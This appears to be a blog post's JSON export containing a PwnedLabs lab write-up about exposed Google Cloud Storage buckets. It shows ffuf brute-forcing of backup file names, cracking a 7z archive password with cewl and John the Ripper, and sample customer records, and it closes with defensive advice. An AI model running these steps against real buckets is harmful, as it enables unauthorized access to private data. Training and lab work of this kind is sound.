{"id":382,"date":"2024-01-29T20:45:28","date_gmt":"2024-01-30T02:45:28","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=382"},"modified":"2024-04-16T20:55:03","modified_gmt":"2024-04-17T01:55:03","slug":"reveal-hidden-files-in-google-storage","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/29\/reveal-hidden-files-in-google-storage\/","title":{"rendered":"Reveal Hidden Files in Google Storage"},"content":{"rendered":"\n

This blog is based on the free lab provided by PwnedLabs<\/a>. PwnedLabs provides a lot of free labs to practice in the cloud environment on platforms such as AWS, GCP, and Azure. The lab showcases how Cloud storage can be easy to misconfigure and misuse, and there is also a school of thought that it should instead be split into public storage and private storage services. Where a bucket stores a mix of public and private content, the risk is unauthorized access and a possible breach.<\/p>\n\n\n\n

Let’s dive into it! First, we need to download the VPN file and connect via OpenVPN.<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>sudo<\/span> <\/span>openvpn<\/span> <\/span>pwnedlabs.ovpn<\/span> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Once, you get the IP address for the tun adapter, we should be able to interact with the lab. Toggle the On\/Off switch to turn ON the lab and you will see the entry point–which is a web URL in this case.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
Web Server Enumeration<\/mark><\/h3>\n\n\n\n
Going to the link provided, we see the following web page.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
Viewing the page source, there is a comment that reveals some interesting information.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
The subdomain storage.googleapis.com<\/code> belongs to the Google Storage service, while it-storage-bucket<\/code> is the name of the bucket. The name of the bucket doesn’t seem like it’s just dedicated to website resources… let’s check it out.<\/p>\n\n\n\n
We can install the Google Cloud CLI here: https:\/\/cloud.google.com\/sdk\/docs\/install-sdk. Once it’s installed, go ahead and authenticate with a personal Google account.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\n
The link has all the instructions we need to install Google Cloud CLI on Linux<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
gcloud auth login<\/mark><\/h3>\n\n\n\n
Attempting to list the bucket contents using the gcloud<\/code> command returns an access denied error. Specifically, it seems that we (public users) don’t have the storage.buckets.get<\/code> permission on the resource.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>gcloud<\/span> <\/span>storage<\/span> <\/span>buckets<\/span> <\/span>list<\/span> <\/span>gs:\/\/it-storage-bucket\/<\/span> <\/span><\/span>\nERROR:<\/span> (gcloud.storage.buckets.list) User <\/span>[<\/span>someone@gmail.com<\/span>]<\/span> does not have permission to access b instance <\/span>[<\/span>it-storage-bucket<\/span>]<\/span> <\/span>(<\/span>or<\/span> <\/span>it<\/span> <\/span>may<\/span> <\/span>not<\/span> <\/span>exist<\/span>)<\/span>: someone@gmail.com does not have storage.buckets.get access to the Google Cloud Storage bucket. Permission <\/span>'<\/span>storage.buckets.get<\/span>'<\/span> denied on resource <\/span>(<\/span>or<\/span> <\/span>it<\/span> <\/span>may<\/span> <\/span>not<\/span> <\/span>exist<\/span>)<\/span>.<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Although we can’t list the bucket and see what else is stored there (apart from examining website links), Cloud Storage operations use names to identify buckets and objects. Therefore, we can try to make requests to potential file and folder names and infer their existence by analyzing the response codes received. Seeing the generic name of the bucket, we can think of looking for IT-related files.<\/p>\n\n\n\n
FFUF<\/mark><\/h4>\n\n\n\n
Backup files can be an attractive enumeration target as they often contain source code, credentials and other sensitive data. We can download the wordlist below that contains a list of common backup file names. It’s a good idea to maintain your file of discovered files and directories that you find on engagements.<\/p>\n\n\n\n
First, let’s download the wordlist that contains a list of backup files using wget.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
wget<\/span> <\/span>https:\/\/raw.githubusercontent.com\/xajkep\/wordlists\/master\/discovery\/backup_files_only.txt<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
Now, we can run ffuf <\/mark><\/em><\/strong>to begin brute-forcing the directories looking for backup files.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>ffuf<\/span> <\/span>-w<\/span> <\/span>backup_files_only.txt<\/span> <\/span>-u<\/span> <\/span>https:\/\/storage.googleapis.com\/it-storage-bucket\/FUZZ<\/span> <\/span>-mc<\/span> <\/span>200<\/span> <\/span>-c<\/span><\/span>\n<\/span>\n        <\/span>\/<\/span>'___\\  \/'<\/span>___\\<\/span>           <\/span>\/<\/span>'<\/span>___\\       <\/span><\/span>\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       <\/span><\/span>\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      <\/span><\/span>\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      <\/span><\/span>\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       <\/span><\/span>\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       <\/span><\/span>\n<\/span>\n       v2.1.0-dev<\/span><\/span>\n________________________________________________<\/span><\/span>\n<\/span>\n :: Method           : GET<\/span><\/span>\n :: URL              : https:\/\/storage.googleapis.com\/it-storage-bucket\/FUZZ<\/span><\/span>\n :: Wordlist         : FUZZ: \/home\/ishsome\/PwnedLabs\/backup_files_only.txt<\/span><\/span>\n :: Follow redirects : false<\/span><\/span>\n :: Calibration      : false<\/span><\/span>\n :: Timeout          : 10<\/span><\/span>\n :: Threads          : 40<\/span><\/span>\n :: Matcher          : Response status: 200<\/span><\/span>\n________________________________________________<\/span><\/span>\n<\/span>\nbackup.7z               [Status: 200, Size: 22072, Words: 102, Lines: 101, Duration: 276ms]<\/span><\/span>\n:: Progress: [1015\/1015] :: Job [1\/1] :: 282 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Let’s download the backup.7z file using wget.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>wget<\/span> <\/span>https:\/\/storage.googleapis.com\/it-storage-bucket\/backup.7z<\/span><\/span>\n--2024-01-29<\/span> <\/span>20<\/span>:25:52--<\/span>  <\/span>https:\/\/storage.googleapis.com\/it-storage-bucket\/backup.7z<\/span><\/span>\nResolving<\/span> <\/span>storage.googleapis.com<\/span> (storage.googleapis.com)... 142.251.33.91, 142.250.217.91, 142.250.217.123, ...<\/span><\/span>\nConnecting<\/span> <\/span>to<\/span> <\/span>storage.googleapis.com<\/span> (storage.googleapis.com)<\/span>|<\/span>142.251.33.91<\/span>|<\/span>:443...<\/span> <\/span>connected.<\/span><\/span>\nHTTP<\/span> <\/span>request<\/span> <\/span>sent,<\/span> <\/span>awaiting<\/span> <\/span>response...<\/span> <\/span>200<\/span> <\/span>OK<\/span><\/span>\nLength:<\/span> <\/span>22072<\/span> (22K) <\/span>[<\/span>application\/octet-stream<\/span>]<\/span><\/span>\nSaving<\/span> <\/span>to:<\/span> <\/span>\u2018backup.7z\u2019<\/span><\/span>\n<\/span>\nbackup.7z<\/span>              <\/span>100<\/span>%[==========================<\/span>=<\/span>><\/span>]<\/span>  <\/span>21.55<\/span>K<\/span>  <\/span>--.-KB\/s<\/span>    <\/span>in<\/span> <\/span>0.1<\/span>s<\/span>    <\/span><\/span>\n<\/span>\n2024-01-29<\/span> <\/span>20<\/span>:25:53<\/span> (199 <\/span>KB\/s<\/span>) - \u2018backup.7z\u2019 saved <\/span>[<\/span>22072<\/span>\/22072<\/span>]<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
We can now extract the file using 7z.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>7<\/span>z<\/span> <\/span>x<\/span> <\/span>backup.7z<\/span> <\/span><\/span>\n<\/span>\n7-Zip<\/span> <\/span>23.01<\/span> (x64) <\/span>:<\/span> Copyright <\/span>(<\/span>c<\/span>)<\/span> 1999-2023 Igor Pavlov <\/span>:<\/span> 2023-06-20<\/span><\/span>\n <\/span>64-bit<\/span> <\/span>locale=C.UTF-8<\/span> <\/span>Threads:4<\/span> <\/span>OPEN_MAX:1024<\/span><\/span>\n<\/span>\nScanning<\/span> <\/span>the<\/span> <\/span>drive<\/span> <\/span>for<\/span> <\/span>archives:<\/span><\/span>\n1<\/span> <\/span>file,<\/span> <\/span>22072<\/span> <\/span>bytes<\/span> (22 <\/span>KiB<\/span>)<\/span><\/span>\n<\/span>\nExtracting<\/span> <\/span>archive:<\/span> <\/span>backup.7z<\/span><\/span>\n--<\/span><\/span>\nPath<\/span> <\/span>=<\/span> <\/span>backup.7z<\/span><\/span>\nType<\/span> <\/span>=<\/span> <\/span>7<\/span>z<\/span><\/span>\nPhysical<\/span> <\/span>Size<\/span> <\/span>=<\/span> <\/span>22072<\/span><\/span>\nHeaders<\/span> <\/span>Size<\/span> <\/span>=<\/span> <\/span>232<\/span><\/span>\nMethod<\/span> <\/span>=<\/span> <\/span>LZMA2:16<\/span> <\/span>7<\/span>zAES<\/span><\/span>\nSolid<\/span> <\/span>=<\/span> <\/span>+<\/span><\/span>\nBlocks<\/span> <\/span>=<\/span> <\/span>1<\/span><\/span>\n<\/span>\n    <\/span><\/span>\nEnter<\/span> <\/span>password<\/span> (will <\/span>not<\/span> <\/span>be<\/span> <\/span>echoed<\/span>):<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
The file is encrypted with a password. We need to extract the password before we can uncompress it. Let’s use the John-the-ripper<\/mark><\/em><\/strong> tool to extract the password.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>7<\/span>z2john<\/span> <\/span>backup.7z<\/span> <\/span>><\/span> <\/span>backup.hash<\/span><\/span>\nATTENTION:<\/span> <\/span>the<\/span> <\/span>hashes<\/span> <\/span>might<\/span> <\/span>contain<\/span> <\/span>sensitive<\/span> <\/span>encrypted<\/span> <\/span>data.<\/span> <\/span>Be<\/span> <\/span>careful<\/span> <\/span>when<\/span> <\/span>sharing<\/span> <\/span>or<\/span> <\/span>posting<\/span> <\/span>these<\/span> <\/span>hashes<\/span><\/span>\n                                                                                           <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>cat<\/span> <\/span>backup.hash<\/span> <\/span><\/span>\nbackup.7z:$7z$2$19$0$$8$1090375a5c67675f0000000000000000$3425971665$21840$21837$f4241ca97e603bf4f3e6375e64c70a8a3f335cbbcbdf16<\/span> <\/span>..<\/span><<\/span>SNIPPE<\/span>D<\/span>><\/span>..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n
I tried cracking the hash using the rockyou.txt file but was unable to extract it. We are required to create our custom wordlist using cewl.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>cewl<\/span> <\/span>https:\/\/careers.gigantic-retail.com\/index.html<\/span> <\/span>><\/span> <\/span>wordlist.txt<\/span><\/span>\n                                                                                           <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>head<\/span> <\/span>wordlist.txt<\/span>                            <\/span><\/span>\nCeWL<\/span> <\/span>6.1<\/span> (Max <\/span>Length<\/span>) Robin Wood <\/span>(<\/span>robin@digi.ninja<\/span>)<\/span> <\/span>(<\/span>https:\/\/digi.ninja\/<\/span>)<\/span><\/span>\nand<\/span><\/span>\nJoin<\/span><\/span>\nopportunities<\/span><\/span>\nyour<\/span><\/span>\ncareer<\/span><\/span>\nnavbar<\/span><\/span>\nYour<\/span><\/span>\nCareer<\/span><\/span>\nOur<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Running John again with this wordlist, we can get the password in just a few seconds!<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>john<\/span> <\/span>backup.hash<\/span> <\/span>--wordlist=wordlist.txt<\/span>                          <\/span><\/span>\nUsing<\/span> <\/span>default<\/span> <\/span>input<\/span> <\/span>encoding:<\/span> <\/span>UTF-8<\/span><\/span>\nLoaded<\/span> <\/span>1<\/span> <\/span>password<\/span> <\/span>hash<\/span> (7z, <\/span>7<\/span>-Zip<\/span> <\/span>archive<\/span> <\/span>encryption<\/span> [SHA256 <\/span>128<\/span>\/128<\/span> <\/span>SSE2<\/span> <\/span>4<\/span>x<\/span> <\/span>AES]<\/span>)<\/span><\/span>\nCost<\/span> <\/span>1<\/span> (iteration <\/span>count<\/span>) is 524288 <\/span>for<\/span> all loaded hashes<\/span><\/span>\nCost<\/span> <\/span>2<\/span> (padding <\/span>size<\/span>) is 3 <\/span>for<\/span> all loaded hashes<\/span><\/span>\nCost<\/span> <\/span>3<\/span> (compression <\/span>type<\/span>) is 2 <\/span>for<\/span> all loaded hashes<\/span><\/span>\nCost<\/span> <\/span>4<\/span> (data <\/span>length<\/span>) is 21837 <\/span>for<\/span> all loaded hashes<\/span><\/span>\nWill<\/span> <\/span>run<\/span> <\/span>4<\/span> <\/span>OpenMP<\/span> <\/span>threads<\/span><\/span>\nPress<\/span> <\/span>'<\/span>q<\/span>'<\/span> <\/span>or<\/span> <\/span>Ctrl-C<\/span> <\/span>to<\/span> <\/span>abort,<\/span> <\/span>almost<\/span> <\/span>any<\/span> <\/span>other<\/span> <\/span>key<\/span> <\/span>for<\/span> <\/span>status<\/span><\/span>\nbalance<\/span>          (backup.7z)     <\/span><\/span>\n1g<\/span> <\/span>0<\/span>:00:00:04<\/span> <\/span>DONE<\/span> (2024-01-29 <\/span>20<\/span>:40<\/span>) 0.2207g\/s 24.72p\/s 24.72c\/s 24.72C\/s being..achieve<\/span><\/span>\nUse<\/span> <\/span>the<\/span> <\/span>"<\/span>--show<\/span>"<\/span> <\/span>option<\/span> <\/span>to<\/span> <\/span>display<\/span> <\/span>all<\/span> <\/span>of<\/span> <\/span>the<\/span> <\/span>cracked<\/span> <\/span>passwords<\/span> <\/span>reliably<\/span><\/span>\nSession<\/span> <\/span>completed.<\/span> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Extracting the archive and providing the password, we find the names and home addresses of Gigantic Retail customers! We can also get the flag for this challenge.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/PwnedLabs<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>head<\/span> <\/span>customers-credit-review.csv<\/span>                                  <\/span><\/span>\nfirst_name,last_name,address,city,county,state,zip,phone1,phone2,email<\/span><\/span>\nJames,Butt,6649<\/span> <\/span>N<\/span> <\/span>Blue<\/span> <\/span>Gum<\/span> <\/span>St,New<\/span> <\/span>Orleans,Orleans,LA,70116,504-621-8927,504-845-1427,jbutt@gmail.com<\/span><\/span>\nJosephine,Darakjy,4<\/span> <\/span>B<\/span> <\/span>Blue<\/span> <\/span>Ridge<\/span> <\/span>Blvd,Brighton,Livingston,MI,48116,810-292-9388,810-374-9840,josephine_darakjy@darakjy.org<\/span><\/span>\nArt,Venere,8<\/span> <\/span>W<\/span> <\/span>Cerritos<\/span> <\/span>Ave<\/span> <\/span>#54,Bridgeport,Gloucester,NJ,8014,856-636-8749,856-264-4130,art@venere.org<\/span><\/span>\n..<\/span><SNIPPED><\/span>..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
Defense<\/mark><\/h3>\n\n\n\n
Multiple security oversights contributed to this breach, and while each may seem small, combined they had a huge impact. In such scenarios, the reputation damage and fines issued by regulators can be very severe.<\/p>\n\n\n\n
Firstly the commented-out code disclosed the name of the Google Storage bucket that was hosting the website. From there we found that a backup file was discoverable and accessible from anywhere on the internet, provided they know the file name. The backup file was encrypted with a very weak password that was not resilient to offline cracking. It was then found that the file contained unencrypted PII (personally identifiable information), including the names and home addresses of Gigantic Retail customers.<\/p>\n\n\n\n
Cloud storage should either be used to make resources publicly accessible, such as a website, or used to store resources that should only be privately accessible. The bucket should have been used for the single purpose of serving a website. This would help avoid private files being stored on a bucket that is accessible on the internet. Naming the bucket in line with its purpose could help to reduce confusion about what files should be stored there. However, predictable naming conventions or names that provide threat actors with information is also problematic. The recommendation from cloud storage providers is to use per-project random codenames such as deltaorangestouchdown-prod<\/code> to name the buckets.<\/p>\n","protected":false},"excerpt":{"rendered":"
This blog is based on the free lab provided by PwnedLabs. PwnedLabs provides a lot of free labs to practice in the cloud environment on platforms such as AWS, GCP, and Azure. The lab showcases how Cloud storage can be easy to misconfigure and misuse, and there is also a school of thought that it […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,37,35],"tags":[],"class_list":["post-382","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-gcp","category-pwned-labs"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":813,"url":"https:\/\/blog.ishsome.com\/index.php\/2026\/01\/06\/install-qradar-community-edition-in-proxmox\/","url_meta":{"origin":382,"position":0},"title":"Install QRadar Community Edition in Proxmox","author":"ishsome","date":"January 6, 2026","format":false,"excerpt":"In this post, I walk through the process of installing IBM QRadar Community Edition on a Proxmox server in my home lab. This setup helps me explore QRadar\u2019s features, understand its architecture, and gain hands-on experience with one of the most widely used SIEM platforms in cybersecurity. In future blog\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2026\/01\/Pasted-image-20260104092108.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2026\/01\/Pasted-image-20260104092108.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2026\/01\/Pasted-image-20260104092108.jpg?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":638,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/06\/15\/palo-alto-firewall-initial-configuration\/","url_meta":{"origin":382,"position":1},"title":"Palo Alto Firewall: Initial Configuration","author":"ishsome","date":"June 15, 2024","format":false,"excerpt":"Embarking on the path to becoming a Network Security Engineer or already a seasoned Network Engineer interested in mastering Palo Alto firewalls? You've come to the right place. In this blog, we delve into the essential steps of configuring a Palo Alto firewall in EVE-NG, focusing on the initial setup.\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":382,"position":2},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":625,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","url_meta":{"origin":382,"position":3},"title":"CVE-2023-33831","author":"ishsome","date":"May 9, 2024","format":false,"excerpt":"This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":382,"position":4},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":382,"position":5},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=382"}],"version-history":[{"count":3,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/382\/revisions"}],"predecessor-version":[{"id":390,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/382\/revisions\/390"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}